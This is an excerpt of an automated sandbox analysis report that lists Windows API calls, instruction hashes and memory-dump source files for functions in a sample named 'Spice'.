                                                                                                                                                                                                                                      • API String ID: 3970641297-0
                                                                                                                                                                                                                                      • Opcode ID: a6ee0a28af03aed0f0170fd349e0af293a2c7316659e7a202d2d729d1055cef0
                                                                                                                                                                                                                                      • Instruction ID: 26d5dd81bf508a4f63c362ef5d0c367da0d07bc6b15ff456609c6025ae46266b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6ee0a28af03aed0f0170fd349e0af293a2c7316659e7a202d2d729d1055cef0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E115B7250264DBFDF124F949C44EEA7BA9FF59364F455119FB0862150CB319C60EBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED04EC,?,00ED153F,?,00008000), ref: 00ED195E
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00ED04EC,?,00ED153F,?,00008000), ref: 00ED1983
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00ED04EC,?,00ED153F,?,00008000), ref: 00ED198D
                                                                                                                                                                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00ED04EC,?,00ED153F,?,00008000), ref: 00ED19C0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2875609808-0
                                                                                                                                                                                                                                      • Opcode ID: 2b97d5615be754ff6125278b7ede7e12408cc6412a34ce22959ae746b7a75138
                                                                                                                                                                                                                                      • Instruction ID: 32acdd0ab962a2d1d5291ac1bb25a632b0efe9057e89b0263d4911d1d2420b8d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b97d5615be754ff6125278b7ede7e12408cc6412a34ce22959ae746b7a75138
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76115A31D0061CEBCF009FA4D9A8BEEBB78FF48751F005086E980B2241CB3096519B91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00EFE1EA
                                                                                                                                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00EFE201
                                                                                                                                                                                                                                      • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00EFE216
                                                                                                                                                                                                                                      • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00EFE234
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1352324309-0
                                                                                                                                                                                                                                      • Opcode ID: cfce9f1a1fdb15c580558e801fc842ea63cba7b0f292f49e55aae857627cb264
                                                                                                                                                                                                                                      • Instruction ID: 2d97bceed9ca1a3803a0c9d92bcfcf15bc0668defae34b3e004b8fe0ac95323e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfce9f1a1fdb15c580558e801fc842ea63cba7b0f292f49e55aae857627cb264
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 551130752063089BE7208F51DD08BA37BACEB00B04F108559A759A6171E7B0F504AB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                                                                                                      • Instruction ID: 9204122124d741c5625c3f50bd6f67de4b84f46591e7e28e916adef12a721010
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01837604814EBBCF129F84CC019ED3F66FB1E344B049555FE9868131D336D971AB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EFB956
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EFB96E
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EFB992
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EFB9AD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 357397906-0
                                                                                                                                                                                                                                      • Opcode ID: 95cdc7633c312dff7c3aee945ddcc21a1571cc03e449f2e71f8e7bb9d0e08c40
                                                                                                                                                                                                                                      • Instruction ID: 70af1d811a3345bef28667c6339c19f2d4fdd57df47ac075d30688b917e18ab8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95cdc7633c312dff7c3aee945ddcc21a1571cc03e449f2e71f8e7bb9d0e08c40
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B11143B9D0020DEFDB41CF98C984AEEBBF9FB48310F108156E914E3610DB75AA659F50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EFBCB6
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EFBCC5
                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F38F20,00F38F64), ref: 00EFBCF4
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00EFBD06
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3277943733-0
                                                                                                                                                                                                                                      • Opcode ID: 973cd2e556ffc2b00f7806f7b5ad4a652193793a4462ed303701b2e6d6f3e329
                                                                                                                                                                                                                                      • Instruction ID: afacf84c6f18f456ac08f83b4183b7c37c5c82d0952112bd4098b284bc028a73
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 973cd2e556ffc2b00f7806f7b5ad4a652193793a4462ed303701b2e6d6f3e329
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72F012B25403087FE7502775AC05FBB3A5EEB097A5F001421BA08E61A2DF7A5D11A7A9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00ED71A1
                                                                                                                                                                                                                                        • Part of subcall function 00ED7C7F: _memset.LIBCMT ref: 00ED7CB4
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00ED71C4
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ED71D1
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00ED71E1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 48991266-0
                                                                                                                                                                                                                                      • Opcode ID: d5090b51d4f5723df6b4f588574b03f3df3dcbec279d1f8e360232401b193fa3
                                                                                                                                                                                                                                      • Instruction ID: 51f534021971346276656d21e19a30dde40042223371dee9def71a069b0301f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5090b51d4f5723df6b4f588574b03f3df3dcbec279d1f8e360232401b193fa3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43F0F476100104ABCF416F55DC85B4AFB69FF45361F04D055FE086E21BCB31A951DBB5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E71729
                                                                                                                                                                                                                                        • Part of subcall function 00E716CF: SelectObject.GDI32(?,00000000), ref: 00E71738
                                                                                                                                                                                                                                        • Part of subcall function 00E716CF: BeginPath.GDI32(?), ref: 00E7174F
                                                                                                                                                                                                                                        • Part of subcall function 00E716CF: SelectObject.GDI32(?,00000000), ref: 00E71778
                                                                                                                                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EFC3E8
                                                                                                                                                                                                                                      • LineTo.GDI32(00000000,?,?), ref: 00EFC3F5
                                                                                                                                                                                                                                      • EndPath.GDI32(00000000), ref: 00EFC405
                                                                                                                                                                                                                                      • StrokePath.GDI32(00000000), ref: 00EFC413
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1539411459-0
                                                                                                                                                                                                                                      • Opcode ID: d160332c1855a8137b63e18368d4685afc8b17ccb0be476d72d8d7bc13535fe3
                                                                                                                                                                                                                                      • Instruction ID: eb6ebfef75bdbaca1cf77cc49d5a441cd5b123a29f6fb980206a3c002dc51bd1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d160332c1855a8137b63e18368d4685afc8b17ccb0be476d72d8d7bc13535fe3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F05E3100525DBADB236F54AC0DFDE3F99BF05321F248040FB55611E18BB45551EBA9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECAA6F
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECAA82
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00ECAA89
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 00ECAA90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2710830443-0
                                                                                                                                                                                                                                      • Opcode ID: d5376eebd078b07ebf52d6b0863cc84e2215952d837dfe6bd01b9265645674db
                                                                                                                                                                                                                                      • Instruction ID: 5c16d21414b41fd95ec64c1eaa501e91eadbc9e3b46cff31835a6836805ddc13
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5376eebd078b07ebf52d6b0863cc84e2215952d837dfe6bd01b9265645674db
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9E0393154122CBADB215FA29E0CFE73F5DFF157A5F048025F50994060CA728551DBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 00E7260D
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 00E72617
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00E7262C
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00E72634
                                                                                                                                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 00EAC1C4
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EAC1D1
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00EAC1EA
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00EAC203
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00EAC223
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00EAC22E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1946975507-0
                                                                                                                                                                                                                                      • Opcode ID: d9bd8fa3aa64165b6ec8a8833f92065494c9f736cc480703f880f0ae0a359659
                                                                                                                                                                                                                                      • Instruction ID: 86c2ff506fe4b7fc007b089e123d95f16259f6efeaabc82c25ac7208d37ff51b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9bd8fa3aa64165b6ec8a8833f92065494c9f736cc480703f880f0ae0a359659
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7E0E531504248BBDB215FA4AC497D83B11FB15335F148366FA69580E58B714590EB11
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 00EC9339
                                                                                                                                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00EC8F04), ref: 00EC9340
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EC8F04), ref: 00EC934D
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00EC8F04), ref: 00EC9354
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3974789173-0
                                                                                                                                                                                                                                      • Opcode ID: c7ae1eff427b1aede4c9134dbdbe9b1b75178acc8c21e39da59a9485d3ac5f1c
                                                                                                                                                                                                                                      • Instruction ID: 68d5947a7e6aac0ea5e7d8fa3d8cd536810d147972374a382baf31d4e9c6369d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7ae1eff427b1aede4c9134dbdbe9b1b75178acc8c21e39da59a9485d3ac5f1c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE08C72602315EFDB201FB5AE0DF5A3BACFF507A6F108818B285DA090EF389445DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EB0679
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EB0683
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB06A3
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 00EB06C4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                      • Opcode ID: 8887d01e49824c565bd7400505680d46c7c5c1abf2afbc46473e4ca8346a2e15
                                                                                                                                                                                                                                      • Instruction ID: d9bff1f92ce62c2e3da25dc757975c8ee18afdde7400e195f6735c464f8e0dd3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8887d01e49824c565bd7400505680d46c7c5c1abf2afbc46473e4ca8346a2e15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25E0EEB1800609EFCB019FA0D808BAE7BF2BB8C310F118009F99AA7260CF399551AF50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00EB068D
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EB0697
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EB06A3
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 00EB06C4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                      • Opcode ID: 95d1d68145a484b8c397645e345e8f7670d49c13ada7b0df47cf1381ef0a955b
                                                                                                                                                                                                                                      • Instruction ID: e6fb41afb00c4c45f6c03b20e7265a75f0442e519a17e9876bf9df1f0a3183f5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95d1d68145a484b8c397645e345e8f7670d49c13ada7b0df47cf1381ef0a955b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDE012B1800609EFCB119FA0D808B9D7FF2BB8C310F108009F99AA7260CF399551AF50
                                                                                                                                                                                                                                      Uniqueness

